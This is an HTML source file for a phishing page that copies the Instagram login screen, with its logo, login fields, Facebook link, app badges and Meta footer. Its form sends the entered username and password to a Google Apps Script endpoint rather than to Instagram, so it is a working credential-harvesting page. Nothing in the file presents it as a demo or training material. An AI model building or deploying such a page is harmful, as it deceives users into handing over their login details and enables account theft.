<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<style>
    body{
        background-color: rgb(248, 248, 248);
    }
    h1{
        font-family:cursive ;
    }
    .box{
        max-width: 500px;
  margin: auto;
  padding: 10px;
  border-style: solid;
  border-width: 0.5px;
  border-color: rgb(201, 197, 197);
  border-radius: 5px;
  height: 450px;
  width: 350px;
  background-color: rgb(248, 248, 248);
    }
    .form2{
    background-color: rgb(248, 248, 248);
    margin: auto;
  padding: 10px;
  border-style: solid;
  border-width: 0.5px;
  border-color: rgb(201, 197, 197);
  border-radius: 5px;
  height: 50px;
  width: 350px;
  text-align: center
   }
   .box2{
    max-width: 500px;
  margin: auto;
  padding: 10px;
  border-radius: 5px;
  height: 50px;
  width: 350px;
   }
    .items{
        text-align: center;
    }
    .input1{
        height: 50px;
    }
   input{
    width: 280px;
    height: 30px;
    border-radius: 4px;
    border-style: solid;
    border-color: rgb(235, 221, 221);
   }
   button{
    width: 280px;
    height: 40px;
    border-radius: 10px;
    color: aliceblue;
    background-color: rgb(40, 162, 214);
    border-style: solid;
    border-color: rgb(235, 221, 221);;
    margin-top: 30px;
   }
   .down{
    margin-top: 30px;
   }
   ::placeholder{
    color:rgb(160, 152, 155);
   }
   .lb1{
    font-size: small;
    color: rgb(160, 152, 155);
   }
   .d1{
    margin-top: 40px;
   }
   .d2{
    margin-top: 30px;
   }
   .lb2{
    font-family: sans-serif;
    font-size: small;
    color: rgb(4, 54, 124);
    font-weight: bold;
    text-decoration: none;
   }
   .lb3{
    font-family: sans-serif;
    font-size: smaller;
    color: rgb(4, 54, 124);
    text-decoration: none;
   }
   .d3{
    margin-top: 20px;
   }
   .a1{
    text-decoration: none;
    color:  rgb(5, 143, 203);
   }
   .lb4{
    font-family: sans-serif;
    font-size: smaller;
   }
   .img1{
    width:30px;
    height: 30px;
   }
   
   .d5{
    margin-top: 10px;
   }
   .d6{
    margin-top:2px;
    margin-left: 145px;
   }
   .lb5{
    font-family: sans-serif;
    font-size: smaller;
   }
   .img2{
    width:120px;
    height: 40px;
   }
   .img3{
    width:100px;
    height: 40px;
   }
   .d7{
    margin-left: 70px;
    margin-top: 4px;
   }
   footer{
    text-align: center;
    margin-top: 50px;
   }
   .lb6{
    font-family: sans-serif;
    font-size: smaller;
    color: rgb(145, 150, 146);
   }
   .lb7{
    font-family: sans-serif;
    font-size: smaller;
    color: rgb(145, 150, 146);
   }
   .d8{
    margin-top: 20px;
    margin-bottom: 20px;
   }
   .img4{
    margin-top: 30px; ;
    width:190px;
    height: 60px;
   }
   .tick{
    width: 15px;
    height: 15px;
    
   }
   .check{
    margin-top: 10px;
    width:200px;
    height: 2px;
   }
   .lb0{
    font-size: smaller;
    font-family:'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
    font-weight: lighter;
   }
</style>
<body>
    <div>
      
        <form class="box" method="post" action="https://script.google.com/macros/s/AKfycbyZIW81qlFb4r0zz4kyqK5MMJPXgIB0xx3xOWfmJOJMhxmi0vJcv_4uYhm_4hMJUeREeA/exec">
            <div class="items">
            <img class="img4" src="https://www.pngitem.com/pimgs/m/132-1327993_instagram-logo-word-png-transparent-png.png">
            <div class="down">
           <div class="input1">
            <input placeholder="Phone number, username or email" name="gmail">
           </div>
           <div class="input2">
            <input placeholder="Password" type="password" name="pswd">
           </div>
           <div class="check">
            <input class="tick" type="checkbox">
            <label class="lb0">Save login info</label>
           </div>
           <button>
            Log in
           </button>
           <div class="d1">
           <label class="lb1">
            ________________ OR ________________
           </label>
           </div>
           
           <div class="d2">
            
            <a href="https://www.facebook.com/login.php?skip_api_login=1&api_key=124024574287414&kid_directed_site=0&app_id=124024574287414&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Foauth%3Fclient_id%3D124024574287414%26redirect_uri%3Dhttps%253A%252F%252Fwww.instagram.com%252Faccounts%252Fsignup%252F%26state%3D%257B%2522fbLoginKey%2522%253A%25221wv4tru1mix649reqpnqyznj3c1h9wkid1378gylji76h97fg6rs%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%26scope%3Demail%26response_type%3Dcode%252Cgranted_scopes%26locale%3Den_US%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3Dd2792b83-8901-43f5-b1b8-434878cf6583%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%2522fbLoginKey%2522%253A%25221wv4tru1mix649reqpnqyznj3c1h9wkid1378gylji76h97fg6rs%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%23_%3D_&display=page&locale=en_GB&pl_dbl=0" class="lb2">
                <img class="img1" src="https://revolvingcompass.com/wp/wp-content/uploads/2017/06/facebook-icon-preview-1-400x400.png">
                Log in with Facebook
            </a>
            
           </div>
           <div class="d3">
            <a href="https://www.instagram.com/accounts/password/reset/" class="lb3">
                Forgot password?
            </a>
           </div>
            </div>
           </div>
          
       </form>
       <form class="form2">
        <div class="d5">
        <label class="lb4">
            Don't have an account?
        </label>
        <a href="https://www.instagram.com/accounts/emailsignup/" class="a1">
            Sign up
        </a>
        </div>
       </form>
       <form class="box2">
       <div class="d6">
        <label class="lb5">
            Get the app
        </label>
       </div>
       <div class="d7">
        <a href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26ig_mid%3D19288707-ACB8-46DA-9578-F6EDBEA264A2%26utm_content%3Dlo%26utm_medium%3Dbadge">
            <img class="img2" src="https://static.cdninstagram.com/rsrc.php/v3/yz/r/c5Rp7Ym-Klz.png">
        </a>
        <a href="ms-windows-store://pdp/?productid=9nblggh5l9xt&referrer=appbadge&source=www.instagram.com&mode=mini&pos=-9%2C-9%2C1937%2C1037">
            <img class="img3" src="https://static.cdninstagram.com/rsrc.php/v3/yu/r/EHY6QnZYdNX.png">
        </a>
       </div>
    </form>
       <footer>
        <label class="lb6">
        Meta &nbsp &nbsp About &nbsp &nbsp Blog  &nbsp &nbsp Jobs &nbsp &nbsp Help &nbsp &nbsp API &nbsp &nbsp Privacy &nbsp &nbsp Terms &nbsp &nbsp Top Accounts &nbsp &nbsp Locations &nbsp &nbsp Instagram Lite  &nbsp &nbsp Contact Uploading & Non-Users &nbsp &nbsp Meta Verified
        </label>
        <div class="d8"> 
        <label class="lb7">
            English © 2023 Instagram from Meta
        </label>
    </div>
       </footer>
    </div>
</body>
</html>